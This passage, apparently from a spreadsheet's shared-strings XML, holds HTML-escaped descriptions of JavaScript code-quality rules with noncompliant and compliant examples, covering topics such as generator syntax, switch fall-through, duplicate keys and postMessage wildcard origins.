    <t>&lt;p&gt;The &lt;code&gt;yield&lt;/code&gt; keyword is used in a generator function to return an &lt;code&gt;IteratorResult&lt;/code&gt; to the caller. It has no other purpose, and\nif found outside such a function will raise a &lt;code&gt;ReferenceError&lt;/code&gt; because it is then treated as an identifier.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo() {\n  for (var i = 0; i &amp;lt; 5; i++) {\n    yield i * 2;\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction * foo() {\n  for (var i = 0; i &amp;lt; 5; i++) {\n    yield i * 2;\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Shared coding conventions allow teams to collaborate effectively. This rule allows to check that all class names (and interfaces for TypeScript)\nmatch a provided regular expression.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;p&gt;With default provided regular expression &lt;code&gt;^[A-Z][a-zA-Z0-9]*$&lt;/code&gt;:&lt;/p&gt;\n&lt;pre&gt;\nclass my_class {...}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nclass MyClass {...}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy/paste\nerror and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical\noperators, having the same value on both sides of an operator yields predictable results, and should be simplified.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (a == b &amp;amp;&amp;amp; a == b) { // if the first one is true, the second one is too\n  doX();\n}\nif (a &amp;gt; a) { // always false\n  doW();\n}\n\nvar j = 5 / 5; //always 1\nvar k = 5 - 5; //always 0\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;The specific case of testing one variable against itself is a valid test for &lt;code&gt;NaN&lt;/code&gt; and is therefore ignored.&lt;/p&gt;\n&lt;p&gt;Similarly, left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored. &lt;/p&gt;\n&lt;p&gt;Moreover comma operator &lt;code&gt;,&lt;/code&gt; and &lt;code&gt;instanceof&lt;/code&gt; operator are ignored as there are use-cases when there usage is valid.&lt;/p&gt;\n&lt;pre&gt;\nif (f !== f) { // test for NaN value\n  console.log("f is NaN");\n}\n\nvar i = 1 &amp;lt;&amp;lt; 1; // Compliant\nvar j = a &amp;lt;&amp;lt; a; // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never\n  executed &lt;/li&gt;\n  &lt;li&gt; {rule:javascript:S1656} - Implements a check on &lt;code&gt;=&lt;/code&gt;. &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1515</t>
  </si>
  <si>
    <t>&lt;p&gt;Defining a function inside of a loop can yield unexpected results. Such a function keeps references to the variables which are defined in outer\nscopes. All function instances created inside the loop therefore see the same values for these variables, which is probably not expected.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar funs = [];\nfor (var i = 0; i &amp;lt; 13; i++) {\n  funs[i] = function() { // Non-Compliant\n    return i;\n  };\n}\nconsole.log(funs[0]()); // 13 instead of 0\nconsole.log(funs[1]()); // 13 instead of 1\nconsole.log(funs[2]()); // 13 instead of 2\nconsole.log(funs[3]()); // 13 instead of 3\n...\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Having two &lt;code&gt;cases&lt;/code&gt; in a &lt;code&gt;switch&lt;/code&gt; statement or two branches in an &lt;code&gt;if&lt;/code&gt; chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an &lt;code&gt;if&lt;/code&gt; chain they should\nbe combined, or for a &lt;code&gt;switch&lt;/code&gt;, one should fall through to the other. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  // Noncompliant; duplicates case 1's implementation\n    doFirstThing();\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &amp;gt;= 0 &amp;amp;&amp;amp; a &amp;lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &amp;gt;= 10 &amp;amp;&amp;amp; a &amp;lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &amp;gt;= 20 &amp;amp;&amp;amp; a &amp;lt; 50) {\n  doFirstThing();\n  doTheThing();  // Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Blocks in an &lt;code&gt;if&lt;/code&gt; chain that contain a single line of code are ignored, as are blocks in a &lt;code&gt;switch&lt;/code&gt; statement that contain a\nsingle line of code with or without a following &lt;code&gt;break&lt;/code&gt;.&lt;/p&gt;\n&lt;pre&gt;\nif (a == 1) {\n  doSomething();  //no issue, usually this is done on purpose to increase the readability\n} else if (a == 2) {\n  doSomethingElse();\n} else {\n  doSomething();\n}\n&lt;/pre&gt;\n&lt;p&gt;But this exception does not apply to &lt;code&gt;if&lt;/code&gt; chains without &lt;code&gt;else&lt;/code&gt;-s, or to &lt;code&gt;switch&lt;/code&gt;-es without default clauses when\nall branches have the same single line of code. In case of &lt;code&gt;if&lt;/code&gt; chains with &lt;code&gt;else&lt;/code&gt;-s, or of &lt;code&gt;switch&lt;/code&gt;-es with default\nclauses, rule {rule:javascript:S3923} raises a bug. &lt;/p&gt;\n&lt;pre&gt;\nif (a == 1) {\n  doSomething();  //Noncompliant, this might have been done on purpose but probably not\n} else if (a == 2) {\n  doSomething();\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Loops with at most one iteration should be refactored</t>
  </si>
  <si>
    <t>&lt;p&gt;A loop with at most one iteration is equivalent to the use of an &lt;code&gt;if&lt;/code&gt; statement to conditionally execute one piece of code. No developer\nexpects to find such a use of a loop statement. If the initial intention of the author was really to conditionally execute one piece of code, an\n&lt;code&gt;if&lt;/code&gt; statement should be used instead.&lt;/p&gt;\n&lt;p&gt;At worst that was not the initial intention of the author and so the body of the loop should be fixed to use the nested &lt;code&gt;return&lt;/code&gt;,\n&lt;code&gt;break&lt;/code&gt; or &lt;code&gt;throw&lt;/code&gt; statements in a more appropriate way.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (let i = 0; i &amp;lt; 10; i++) { // noncompliant, loop only executes once\n  console.log("i is " + i);\n  break;\n}\n...\nfor (let i = 0; i &amp;lt; 10; i++) { // noncompliant, loop only executes once\n  if (i == x) {\n    break;\n  } else {\n    console.log("i is " + i);\n    return;\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (let i = 0; i &amp;lt; 10; i++) {\n  console.log("i is " + i);\n}\n...\nfor (let i = 0; i &amp;lt; 10; i++) {\n  if (i == x) {\n    break;\n  } else {\n    console.log("i is " + i);\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. &lt;/p&gt;\n&lt;p&gt;Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a &lt;code&gt;TypeError&lt;/code&gt; may be\nraised if you do.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfoo = 1;\nfoo();   // Noncompliant; TypeError\n\nfoo = undefined;\nfoo();  // Noncompliant; TypeError\n&lt;/pre&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;switch&lt;/code&gt; statements are useful when there are many different cases depending on the value of the same expression.&lt;/p&gt;\n&lt;p&gt;For just one or two cases however, the code will be more readable with &lt;code&gt;if&lt;/code&gt; statements.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nswitch (variable) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    doSomethingElse();\n    break;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (variable == 0) {\n  doSomething();\n} else {\n  doSomethingElse();\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S108</t>
  </si>
  <si>
    <t>&lt;p&gt;Most of the time a block of code is empty when a piece of code is really missing. So such empty block must be either filled or removed.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (var i = 0; i &amp;lt; length; i++) {}  // Empty on purpose or missing piece of code ?\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;When a block contains a comment, this block is not considered to be empty. Moreover &lt;code&gt;catch&lt;/code&gt; blocks are ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Files should not have too many lines of code</t>
  </si>
  <si>
    <t>&lt;p&gt;A source file that grows too much tends to aggregate too many responsibilities and inevitably becomes harder to understand and therefore to\nmaintain. Above a specific threshold, it is strongly advised to refactor it into smaller pieces of code which focus on well defined tasks. Those\nsmaller files will not only be easier to understand but also probably easier to test.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1534</t>
  </si>
  <si>
    <t>&lt;p&gt;JavaScript allows duplicate property names in classes and object literals, but only the last instance of a duplicated name determines the actual\nvalue that will be used for it. Therefore, changing values of other occurrences of a duplicated name will have no effect and may cause\nmisunderstandings and bugs.&lt;/p&gt;\n&lt;p&gt;Defining a &lt;code&gt;class&lt;/code&gt; with a duplicated &lt;code&gt;constructor&lt;/code&gt; will generate an error.&lt;/p&gt;\n&lt;p&gt;Before ECMAScript 2015, using duplicate names will generate an error in JavaScript strict mode code.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar data = {\n  "key": "value",\n  "1": "value",\n  "key": "value", // Noncompliant - duplicate of "key"\n  'key': "value", // Noncompliant - duplicate of "key"\n  key: "value", // Noncompliant - duplicate of "key"\n  \u006bey: "value", // Noncompliant - duplicate of "key"\n  "\u006bey": "value", // Noncompliant - duplicate of "key"\n  "\x6bey": "value", // Noncompliant - duplicate of "key"\n  1: "value" // Noncompliant - duplicate of "1"\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar data = {\n  "key": "value",\n  "1": "value",\n  "key2": "value",\n  'key3': "value",\n  key4: "value",\n  \u006bey5: "value",\n  "\u006bey6": "value",\n  "\x6bey7": "value",\n  1b: "value"\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1535</t>
  </si>
  <si>
    <t>&lt;p&gt;The &lt;code&gt;for...in&lt;/code&gt; statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.&lt;/p&gt;\n&lt;p&gt;Therefore, the body of every &lt;code&gt;for...in&lt;/code&gt; statement should be wrapped in an &lt;code&gt;if&lt;/code&gt; statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (name in object) {\n    doSomething(name);  // Noncompliant\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (name in object) {\n  if (object.hasOwnProperty(name)) {\n    doSomething(name);\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Loops used to clone objects are ignored.&lt;/p&gt;\n&lt;pre&gt;\nfor (prop in obj) {\n  a[prop] = obj[prop];  // Compliant by exception\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction setName(name) {\n    name = name;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction setName(name) {\n    this.name = name;\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never\n  executed &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1536</t>
  </si>
  <si>
    <t>&lt;p&gt;Function arguments should all have different names to prevent any ambiguity. Indeed, if arguments have the same name, the last duplicated argument\nhides all the previous arguments with the same name (those previous arguments remain available through arguments[i], so they're not completely\ninaccessible).&lt;/p&gt;\n&lt;p&gt;This hiding makes no sense, reduces understandability and maintainability, and obviously can be error prone. Furthermore, in strict mode, declaring\narguments with the same name produces an error.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction compute(a, a, c) { // Noncompliant\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction compute(a, b, c) { // Compliant\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1530</t>
  </si>
  <si>
    <t>&lt;p&gt;While most script engines support function declarations within blocks, from browser to browser, the implementations are inconsistent with each\nother.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (x) {\n  function foo() {} //foo is hoisted in Chrome, Firefox and Safari, but not in Edge.\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (x) {\n  const foo = function() {}\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1533</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the &lt;code&gt;new&lt;/code&gt; keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet x = new Number("0");\nif (x) {\n  alert('hi');  // Shows 'hi'.\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet x = Number("0");\nif (x) {\n  alert('hi');\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;You can easily call a JavaScript function with more arguments than the function needs, but the extra arguments will be just ignored by function\nexecution.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction say(a, b) {\n  print(a + " " + b);\n}\n\nsay("hello", "world", "!"); // Noncompliant; last argument is not used\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;No issue is reported when &lt;code&gt;arguments&lt;/code&gt; is used in the body of the function being called.&lt;/p&gt;\n&lt;pre&gt;\nfunction doSomething(a, b) {\n  compute(arguments);\n}\n\ndoSomething(1, 2, 3) // Compliant\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; MISRA C:2004, 16.6 - The number of arguments passed to a function shall match the number of parameters. &lt;/li&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/628.html"&gt;MITRE, CWE-628&lt;/a&gt; - Function Call with Incorrectly Specified Arguments &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/LoAg"&gt;CERT, DCL07-C.&lt;/a&gt; - Include the appropriate type information in function\n  declarators &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/VQBc"&gt;CERT, EXP37-C.&lt;/a&gt; - Call functions with the correct number and type of arguments\n  &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Functions should not have too many lines of code</t>
  </si>
  <si>
    <t>&lt;p&gt;A function that grows too large tends to aggregate too many responsibilities.&lt;/p&gt;\n&lt;p&gt;Such functions inevitably become harder to understand and therefore harder to maintain. &lt;/p&gt;\n&lt;p&gt;Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.&lt;/p&gt;\n&lt;p&gt;Those smaller functions will not only be easier to understand, but also probably easier to test.&lt;/p&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.&lt;/p&gt;\n&lt;pre&gt;\n(function () { // Ignored by this rule\n\n  function open() {  // Classic function declaration; not ignored\n    // ...\n  }\n\n  function read() {\n    // ...\n  }\n\n  function readlines() {\n    // ...\n  }\n})();\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;A &lt;code&gt;for&lt;/code&gt; loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as &lt;code&gt;while&lt;/code&gt; loops. More\ntypically, an infinite &lt;code&gt;for&lt;/code&gt; loop is a bug. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfor (var i = 0; i &amp;lt; strings.length; i--) { // Noncompliant;\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfor (var i = 0; i &amp;lt; strings.length; i++) {\n  //...\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/zYEzAg"&gt;CERT, MSC54-J.&lt;/a&gt; - Avoid inadvertent wrapping of loop counters &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When a variable is assigned an &lt;code&gt;undefined&lt;/code&gt; or &lt;code&gt;null&lt;/code&gt; value, it has no properties. Trying to access properties of such a\nvariable anyway results in a &lt;code&gt;TypeError&lt;/code&gt;, causing abrupt termination of the script if the error is not caught in a &lt;code&gt;catch&lt;/code&gt;\nblock. But instead of &lt;code&gt;catch&lt;/code&gt;-ing this condition, it is best to avoid it altogether.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (x === undefined) {\n  console.log(x.length); // Noncompliant; TypeError will be thrown\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/476.html"&gt;MITRE, CWE-476&lt;/a&gt; - NULL Pointer Dereference &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/PAw"&gt;CERT, EXP34-C.&lt;/a&gt; - Do not dereference null pointers &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/ZwDOAQ"&gt;CERT, EXP01-J.&lt;/a&gt; - Do not use a null in a case where an object is required\n  &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S128</t>
  </si>
  <si>
    <t>&lt;p&gt;When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nswitch (myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  // Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?\n    doSomething();\n  default:\n    doSomethingElse();\n    break;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nswitch (myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    doSomething();\n    break;\n  default:\n    doSomethingElse();\n    break;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This rule is relaxed in the following cases:&lt;/p&gt;\n&lt;pre&gt;\nswitch (myVariable) {\n  case 0:                                // Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    doSomething();\n    break;\n  case 2:                                // Use of return statement\n    return;\n  case 3:                               // Ends with comment when fall-through is intentional\n    console.log("this case falls through")\n    // fall through\n  case 4:                                // Use of throw statement\n    throw new IllegalStateException();\n  case 5:                                // Use of continue statement\n    continue;\n  default:                               // For the last case, use of break statement is optional\n    doSomethingElse();\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/484.html"&gt;MITRE, CWE-484&lt;/a&gt; - Omitted Break Statement in Switch &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/YIFLAQ"&gt;CERT, MSC17-C.&lt;/a&gt; - Finish every set of statements associated with a case\n  label with a break statement &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/ewHAAQ"&gt;CERT, MSC52-J.&lt;/a&gt; - Finish every set of statements associated with a case\n  label with a break statement &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S125</t>
  </si>
  <si>
    <t>&lt;p&gt;Programmers should not comment out code as it bloats programs and reduces readability.&lt;/p&gt;\n&lt;p&gt;Unused code should be deleted and can be retrieved from source control history if required.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S131</t>
  </si>
  <si>
    <t>"switch" statements should have "default" clauses</t>
  </si>
  <si>
    <t>&lt;p&gt;The requirement for a final &lt;code&gt;default&lt;/code&gt; clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nswitch (param) {  //missing default clause\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n\nswitch (param) {\n  default: // default clause should be the last one\n    error();\n    break;\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nswitch (param) {\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n  default:\n    error();\n    break;\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/478.html"&gt;MITRE, CWE-478&lt;/a&gt; - Missing Default Case in Switch Statement &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/YgE"&gt;CERT, MSC01-C.&lt;/a&gt; - Strive for logical completeness &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction pickNumber() {\n  let i = 0;\n  i = i++; // Noncompliant; i is still zero\n\n  return i++; // Noncompliant; 0 returned\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction pickNumber() {\n  let i = 0;\n  i++;\n\n  return ++i;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n"result" to a variable is probably a bug because such functions return &lt;code&gt;undefined&lt;/code&gt;, which is probably not what was intended.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo() {\n  console.log("Hello, World!");\n}\n\na = foo();\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo() {\n  console.log("Hello, World!");\n}\n\nfoo();\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Having all branches in a &lt;code&gt;switch&lt;/code&gt; or &lt;code&gt;if&lt;/code&gt; chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a &lt;code&gt;switch&lt;/code&gt;/&lt;code&gt;if&lt;/code&gt; chain at all.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (b == 0) {  // Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? getValue() : getValue();   // Noncompliant\n\nswitch (i) {  // Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;This rule does not apply to &lt;code&gt;if&lt;/code&gt; chains without &lt;code&gt;else&lt;/code&gt;-s, or to &lt;code&gt;switch&lt;/code&gt;-es without &lt;code&gt;default&lt;/code&gt;\nclauses.&lt;/p&gt;\n&lt;pre&gt;\nif(b == 0) {    //no issue, this could have been done on purpose to make the code more readable\n  doSomething();\n} else if(b == 1) {\n  doSomething();\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The unary operators &lt;code&gt;+&lt;/code&gt; and &lt;code&gt;-&lt;/code&gt; can be used to convert some value types to numeric values. But not every value can be\nconverted to a &lt;code&gt;Number&lt;/code&gt; type; use it with an object, and result will be &lt;code&gt;NaN&lt;/code&gt; (Not A Number). This can be confusing to\nmaintainers.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar obj = {x : 1};\ndoSomethingWithNumber(+obj);    // Noncompliant\n\nfunction foo(){\n  return 1;\n}\ndoSomethingWithNumber(-foo);    // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar obj = {x : 1};\ndoSomethingWithNumber(+obj.x);\n\nfunction foo(){\n  return 1;\n}\ndoSomethingWithNumber(-foo());\n\nvar str = '42';\ndoSomethingWithNumber(+str);\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;p&gt;Unary &lt;code&gt;+&lt;/code&gt; and &lt;code&gt;-&lt;/code&gt; can be used with objects corresponding to primitive types, and &lt;code&gt;+&lt;/code&gt; can be used with\n&lt;code&gt;Date&lt;/code&gt;.&lt;/p&gt;\n&lt;pre&gt;\nvar b = new Boolean(true);\ndoSomethingWithNumber(-b);  // Compliant\nvar timestamp = +new Date();  // Compliant\n&lt;/pre&gt;\n&lt;h2&gt;Deprecated&lt;/h2&gt;\n&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;HTML5 adds the ability to send messages to documents served from other domains. According to the specification:&lt;/p&gt;\n&lt;blockquote&gt;\n  Authors should not use the wildcard keyword (\n  &lt;code&gt;*&lt;/code&gt;) in the\n  &lt;code&gt;targetOrigin&lt;/code&gt; argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n  is only delivered to the recipient to which it was intended.\n&lt;/blockquote&gt;\n&lt;p&gt;To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n&lt;code&gt;Window.postMessage&lt;/code&gt; is used.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, "*"); // Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)"&gt;OWASP Top 10 2017 Category A7&lt;/a&gt; - Cross-Site Scripting\n  (XSS) &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Unused assignments should be removed</t>
  </si>
  <si>
